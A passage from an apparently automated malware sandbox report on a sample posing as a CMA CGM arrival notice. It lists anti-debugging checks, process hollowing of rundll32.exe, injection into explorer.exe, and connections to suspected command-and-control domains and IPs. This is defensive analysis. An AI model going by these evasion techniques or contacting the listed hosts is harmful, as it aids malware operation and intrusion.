Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04934015 mov eax, dword ptr fs:[00000030h] 14_2_04934015
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04934015 mov eax, dword ptr fs:[00000030h] 14_2_04934015
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04921C06 mov eax, dword ptr fs:[00000030h] 14_2_04921C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04921C06 mov eax, dword ptr fs:[00000030h] 14_2_04921C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04921C06 mov eax, dword ptr fs:[00000030h] 14_2_04921C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04921C06 mov eax, dword ptr fs:[00000030h] 14_2_04921C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04921C06 mov eax, dword ptr fs:[00000030h] 14_2_04921C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04921C06 mov eax, dword ptr fs:[00000030h] 14_2_04921C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04921C06 mov eax, dword ptr fs:[00000030h] 14_2_04921C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04921C06 mov eax, dword ptr fs:[00000030h] 14_2_04921C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04921C06 mov eax, dword ptr fs:[00000030h] 14_2_04921C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04921C06 mov eax, dword ptr fs:[00000030h] 14_2_04921C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04921C06 mov eax, dword ptr fs:[00000030h] 14_2_04921C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04921C06 mov eax, dword ptr fs:[00000030h] 14_2_04921C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04921C06 mov eax, dword ptr fs:[00000030h] 14_2_04921C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04921C06 mov eax, dword ptr fs:[00000030h] 14_2_04921C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048E7016 mov eax, dword ptr fs:[00000030h] 14_2_048E7016
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048E7016 mov eax, dword ptr fs:[00000030h] 14_2_048E7016
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048E7016 mov eax, dword ptr fs:[00000030h] 14_2_048E7016
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0493740D mov eax, dword ptr fs:[00000030h] 14_2_0493740D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0493740D mov eax, dword ptr fs:[00000030h] 14_2_0493740D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0493740D mov eax, dword ptr fs:[00000030h] 14_2_0493740D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0489002D mov eax, dword ptr fs:[00000030h] 14_2_0489002D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0489002D mov eax, dword ptr fs:[00000030h] 14_2_0489002D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0489002D mov eax, dword ptr fs:[00000030h] 14_2_0489002D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0489002D mov eax, dword ptr fs:[00000030h] 14_2_0489002D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0489002D mov eax, dword ptr fs:[00000030h] 14_2_0489002D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0489BC2C mov eax, dword ptr fs:[00000030h] 14_2_0489BC2C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0487B02A mov eax, dword ptr fs:[00000030h] 14_2_0487B02A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0487B02A mov eax, dword ptr fs:[00000030h] 14_2_0487B02A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0487B02A mov eax, dword ptr fs:[00000030h] 14_2_0487B02A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0487B02A mov eax, dword ptr fs:[00000030h] 14_2_0487B02A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0489A44B mov eax, dword ptr fs:[00000030h] 14_2_0489A44B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04880050 mov eax, dword ptr fs:[00000030h] 14_2_04880050
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04880050 mov eax, dword ptr fs:[00000030h] 14_2_04880050
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048FC450 mov eax, dword ptr fs:[00000030h] 14_2_048FC450
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048FC450 mov eax, dword ptr fs:[00000030h] 14_2_048FC450
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04922073 mov eax, dword ptr fs:[00000030h] 14_2_04922073
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0488746D mov eax, dword ptr fs:[00000030h] 14_2_0488746D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04931074 mov eax, dword ptr fs:[00000030h] 14_2_04931074
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0488C182 mov eax, dword ptr fs:[00000030h] 14_2_0488C182
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0489A185 mov eax, dword ptr fs:[00000030h] 14_2_0489A185
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04862D8A mov eax, dword ptr fs:[00000030h] 14_2_04862D8A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04862D8A mov eax, dword ptr fs:[00000030h] 14_2_04862D8A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04862D8A mov eax, dword ptr fs:[00000030h] 14_2_04862D8A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04862D8A mov eax, dword ptr fs:[00000030h] 14_2_04862D8A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04862D8A mov eax, dword ptr fs:[00000030h] 14_2_04862D8A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0489FD9B mov eax, dword ptr fs:[00000030h] 14_2_0489FD9B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0489FD9B mov eax, dword ptr fs:[00000030h] 14_2_0489FD9B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04892990 mov eax, dword ptr fs:[00000030h] 14_2_04892990
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048935A1 mov eax, dword ptr fs:[00000030h] 14_2_048935A1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048E69A6 mov eax, dword ptr fs:[00000030h] 14_2_048E69A6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048961A0 mov eax, dword ptr fs:[00000030h] 14_2_048961A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048961A0 mov eax, dword ptr fs:[00000030h] 14_2_048961A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048E51BE mov eax, dword ptr fs:[00000030h] 14_2_048E51BE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048E51BE mov eax, dword ptr fs:[00000030h] 14_2_048E51BE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048E51BE mov eax, dword ptr fs:[00000030h] 14_2_048E51BE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048E51BE mov eax, dword ptr fs:[00000030h] 14_2_048E51BE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04891DB5 mov eax, dword ptr fs:[00000030h] 14_2_04891DB5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04891DB5 mov eax, dword ptr fs:[00000030h] 14_2_04891DB5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04891DB5 mov eax, dword ptr fs:[00000030h] 14_2_04891DB5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04918DF1 mov eax, dword ptr fs:[00000030h] 14_2_04918DF1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0486B1E1 mov eax, dword ptr fs:[00000030h] 14_2_0486B1E1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0486B1E1 mov eax, dword ptr fs:[00000030h] 14_2_0486B1E1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0486B1E1 mov eax, dword ptr fs:[00000030h] 14_2_0486B1E1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048F41E8 mov eax, dword ptr fs:[00000030h] 14_2_048F41E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0487D5E0 mov eax, dword ptr fs:[00000030h] 14_2_0487D5E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0487D5E0 mov eax, dword ptr fs:[00000030h] 14_2_0487D5E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04869100 mov eax, dword ptr fs:[00000030h] 14_2_04869100
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04869100 mov eax, dword ptr fs:[00000030h] 14_2_04869100
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04869100 mov eax, dword ptr fs:[00000030h] 14_2_04869100
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04938D34 mov eax, dword ptr fs:[00000030h] 14_2_04938D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04884120 mov eax, dword ptr fs:[00000030h] 14_2_04884120
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04884120 mov eax, dword ptr fs:[00000030h] 14_2_04884120
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04884120 mov eax, dword ptr fs:[00000030h] 14_2_04884120
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04884120 mov eax, dword ptr fs:[00000030h] 14_2_04884120
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04884120 mov ecx, dword ptr fs:[00000030h] 14_2_04884120
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04894D3B mov eax, dword ptr fs:[00000030h] 14_2_04894D3B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04894D3B mov eax, dword ptr fs:[00000030h] 14_2_04894D3B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04894D3B mov eax, dword ptr fs:[00000030h] 14_2_04894D3B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0489513A mov eax, dword ptr fs:[00000030h] 14_2_0489513A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0489513A mov eax, dword ptr fs:[00000030h] 14_2_0489513A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04873D34 mov eax, dword ptr fs:[00000030h] 14_2_04873D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04873D34 mov eax, dword ptr fs:[00000030h] 14_2_04873D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04873D34 mov eax, dword ptr fs:[00000030h] 14_2_04873D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04873D34 mov eax, dword ptr fs:[00000030h] 14_2_04873D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04873D34 mov eax, dword ptr fs:[00000030h] 14_2_04873D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04873D34 mov eax, dword ptr fs:[00000030h] 14_2_04873D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04873D34 mov eax, dword ptr fs:[00000030h] 14_2_04873D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04873D34 mov eax, dword ptr fs:[00000030h] 14_2_04873D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04873D34 mov eax, dword ptr fs:[00000030h] 14_2_04873D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04873D34 mov eax, dword ptr fs:[00000030h] 14_2_04873D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04873D34 mov eax, dword ptr fs:[00000030h] 14_2_04873D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04873D34 mov eax, dword ptr fs:[00000030h] 14_2_04873D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04873D34 mov eax, dword ptr fs:[00000030h] 14_2_04873D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0486AD30 mov eax, dword ptr fs:[00000030h] 14_2_0486AD30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048EA537 mov eax, dword ptr fs:[00000030h] 14_2_048EA537
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048A3D43 mov eax, dword ptr fs:[00000030h] 14_2_048A3D43
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0488B944 mov eax, dword ptr fs:[00000030h] 14_2_0488B944
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0488B944 mov eax, dword ptr fs:[00000030h] 14_2_0488B944
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048E3540 mov eax, dword ptr fs:[00000030h] 14_2_048E3540
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04887D50 mov eax, dword ptr fs:[00000030h] 14_2_04887D50
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0486C962 mov eax, dword ptr fs:[00000030h] 14_2_0486C962
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0486B171 mov eax, dword ptr fs:[00000030h] 14_2_0486B171
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0486B171 mov eax, dword ptr fs:[00000030h] 14_2_0486B171
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0488C577 mov eax, dword ptr fs:[00000030h] 14_2_0488C577
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0488C577 mov eax, dword ptr fs:[00000030h] 14_2_0488C577
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048FFE87 mov eax, dword ptr fs:[00000030h] 14_2_048FFE87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0489D294 mov eax, dword ptr fs:[00000030h] 14_2_0489D294
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0489D294 mov eax, dword ptr fs:[00000030h] 14_2_0489D294
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048652A5 mov eax, dword ptr fs:[00000030h] 14_2_048652A5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048652A5 mov eax, dword ptr fs:[00000030h] 14_2_048652A5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048652A5 mov eax, dword ptr fs:[00000030h] 14_2_048652A5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048652A5 mov eax, dword ptr fs:[00000030h] 14_2_048652A5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048652A5 mov eax, dword ptr fs:[00000030h] 14_2_048652A5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048E46A7 mov eax, dword ptr fs:[00000030h] 14_2_048E46A7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04930EA5 mov eax, dword ptr fs:[00000030h] 14_2_04930EA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04930EA5 mov eax, dword ptr fs:[00000030h] 14_2_04930EA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04930EA5 mov eax, dword ptr fs:[00000030h] 14_2_04930EA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0487AAB0 mov eax, dword ptr fs:[00000030h] 14_2_0487AAB0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0487AAB0 mov eax, dword ptr fs:[00000030h] 14_2_0487AAB0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0489FAB0 mov eax, dword ptr fs:[00000030h] 14_2_0489FAB0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04892ACB mov eax, dword ptr fs:[00000030h] 14_2_04892ACB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04938ED6 mov eax, dword ptr fs:[00000030h] 14_2_04938ED6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048936CC mov eax, dword ptr fs:[00000030h] 14_2_048936CC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048A8EC7 mov eax, dword ptr fs:[00000030h] 14_2_048A8EC7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0491FEC0 mov eax, dword ptr fs:[00000030h] 14_2_0491FEC0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048776E2 mov eax, dword ptr fs:[00000030h] 14_2_048776E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048916E0 mov ecx, dword ptr fs:[00000030h] 14_2_048916E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04892AE4 mov eax, dword ptr fs:[00000030h] 14_2_04892AE4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0486C600 mov eax, dword ptr fs:[00000030h] 14_2_0486C600
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0486C600 mov eax, dword ptr fs:[00000030h] 14_2_0486C600
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0486C600 mov eax, dword ptr fs:[00000030h] 14_2_0486C600
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04898E00 mov eax, dword ptr fs:[00000030h] 14_2_04898E00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04878A0A mov eax, dword ptr fs:[00000030h] 14_2_04878A0A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0486AA16 mov eax, dword ptr fs:[00000030h] 14_2_0486AA16
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0486AA16 mov eax, dword ptr fs:[00000030h] 14_2_0486AA16
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04883A1C mov eax, dword ptr fs:[00000030h] 14_2_04883A1C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0489A61C mov eax, dword ptr fs:[00000030h] 14_2_0489A61C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0489A61C mov eax, dword ptr fs:[00000030h] 14_2_0489A61C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0486E620 mov eax, dword ptr fs:[00000030h] 14_2_0486E620
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0491FE3F mov eax, dword ptr fs:[00000030h] 14_2_0491FE3F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04869240 mov eax, dword ptr fs:[00000030h] 14_2_04869240
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04869240 mov eax, dword ptr fs:[00000030h] 14_2_04869240
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04869240 mov eax, dword ptr fs:[00000030h] 14_2_04869240
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04869240 mov eax, dword ptr fs:[00000030h] 14_2_04869240
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04877E41 mov eax, dword ptr fs:[00000030h] 14_2_04877E41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04877E41 mov eax, dword ptr fs:[00000030h] 14_2_04877E41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04877E41 mov eax, dword ptr fs:[00000030h] 14_2_04877E41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04877E41 mov eax, dword ptr fs:[00000030h] 14_2_04877E41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04877E41 mov eax, dword ptr fs:[00000030h] 14_2_04877E41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04877E41 mov eax, dword ptr fs:[00000030h] 14_2_04877E41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048F4257 mov eax, dword ptr fs:[00000030h] 14_2_048F4257
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0487766D mov eax, dword ptr fs:[00000030h] 14_2_0487766D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048A927A mov eax, dword ptr fs:[00000030h] 14_2_048A927A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0491B260 mov eax, dword ptr fs:[00000030h] 14_2_0491B260
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0491B260 mov eax, dword ptr fs:[00000030h] 14_2_0491B260
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04938A62 mov eax, dword ptr fs:[00000030h] 14_2_04938A62
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0488AE73 mov eax, dword ptr fs:[00000030h] 14_2_0488AE73
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0488AE73 mov eax, dword ptr fs:[00000030h] 14_2_0488AE73
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0488AE73 mov eax, dword ptr fs:[00000030h] 14_2_0488AE73
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0488AE73 mov eax, dword ptr fs:[00000030h] 14_2_0488AE73
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0488AE73 mov eax, dword ptr fs:[00000030h] 14_2_0488AE73
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04871B8F mov eax, dword ptr fs:[00000030h] 14_2_04871B8F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04871B8F mov eax, dword ptr fs:[00000030h] 14_2_04871B8F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0491D380 mov ecx, dword ptr fs:[00000030h] 14_2_0491D380
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04878794 mov eax, dword ptr fs:[00000030h] 14_2_04878794
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0492138A mov eax, dword ptr fs:[00000030h] 14_2_0492138A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0489B390 mov eax, dword ptr fs:[00000030h] 14_2_0489B390
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048E7794 mov eax, dword ptr fs:[00000030h] 14_2_048E7794
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048E7794 mov eax, dword ptr fs:[00000030h] 14_2_048E7794
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048E7794 mov eax, dword ptr fs:[00000030h] 14_2_048E7794
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04935BA5 mov eax, dword ptr fs:[00000030h] 14_2_04935BA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048E53CA mov eax, dword ptr fs:[00000030h] 14_2_048E53CA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048E53CA mov eax, dword ptr fs:[00000030h] 14_2_048E53CA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048903E2 mov eax, dword ptr fs:[00000030h] 14_2_048903E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048903E2 mov eax, dword ptr fs:[00000030h] 14_2_048903E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048903E2 mov eax, dword ptr fs:[00000030h] 14_2_048903E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048903E2 mov eax, dword ptr fs:[00000030h] 14_2_048903E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048903E2 mov eax, dword ptr fs:[00000030h] 14_2_048903E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048903E2 mov eax, dword ptr fs:[00000030h] 14_2_048903E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048A37F5 mov eax, dword ptr fs:[00000030h] 14_2_048A37F5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0489A70E mov eax, dword ptr fs:[00000030h] 14_2_0489A70E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0489A70E mov eax, dword ptr fs:[00000030h] 14_2_0489A70E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0492131B mov eax, dword ptr fs:[00000030h] 14_2_0492131B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0493070D mov eax, dword ptr fs:[00000030h] 14_2_0493070D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0493070D mov eax, dword ptr fs:[00000030h] 14_2_0493070D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0488F716 mov eax, dword ptr fs:[00000030h] 14_2_0488F716
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048FFF10 mov eax, dword ptr fs:[00000030h] 14_2_048FFF10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048FFF10 mov eax, dword ptr fs:[00000030h] 14_2_048FFF10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04864F2E mov eax, dword ptr fs:[00000030h] 14_2_04864F2E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04864F2E mov eax, dword ptr fs:[00000030h] 14_2_04864F2E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0489E730 mov eax, dword ptr fs:[00000030h] 14_2_0489E730
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0486DB40 mov eax, dword ptr fs:[00000030h] 14_2_0486DB40
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0487EF40 mov eax, dword ptr fs:[00000030h] 14_2_0487EF40
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04938B58 mov eax, dword ptr fs:[00000030h] 14_2_04938B58
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0486F358 mov eax, dword ptr fs:[00000030h] 14_2_0486F358
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0486DB60 mov ecx, dword ptr fs:[00000030h] 14_2_0486DB60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0487FF60 mov eax, dword ptr fs:[00000030h] 14_2_0487FF60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04893B7A mov eax, dword ptr fs:[00000030h] 14_2_04893B7A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04893B7A mov eax, dword ptr fs:[00000030h] 14_2_04893B7A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_04938F6A mov eax, dword ptr fs:[00000030h] 14_2_04938F6A
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Process queried: DebugPort
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Process queried: DebugPort
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078CE61 LdrInitializeThunk, 0_2_0078CE61

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 209.99.40.222 80
Source: C:\Windows\explorer.exe Network Connect: 142.111.236.6 80
Source: C:\Windows\explorer.exe Domain query: www.microsoftjob.com
Source: C:\Windows\explorer.exe Network Connect: 160.153.136.3 80
Source: C:\Windows\explorer.exe Domain query: www.wxsjykj.com
Source: C:\Windows\explorer.exe Domain query: www.everythingswallow.com
Source: C:\Windows\explorer.exe Domain query: www.acooll.com
Source: C:\Windows\explorer.exe Network Connect: 44.227.76.166 80
Source: C:\Windows\explorer.exe Domain query: www.priorpublic.com
Source: C:\Windows\explorer.exe Network Connect: 91.195.240.117 80
Source: C:\Windows\explorer.exe Network Connect: 54.65.172.3 80
Source: C:\Windows\explorer.exe Domain query: www.taylormakeyourlife.com
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe Domain query: www.beckyhartpcpublishers.com
Source: C:\Windows\explorer.exe Domain query: www.rlmwebcreations.com
Source: C:\Windows\explorer.exe Domain query: www.dominionhavanese.com
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Section unmapped: C:\Windows\SysWOW64\rundll32.exe base address: 10E0000
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
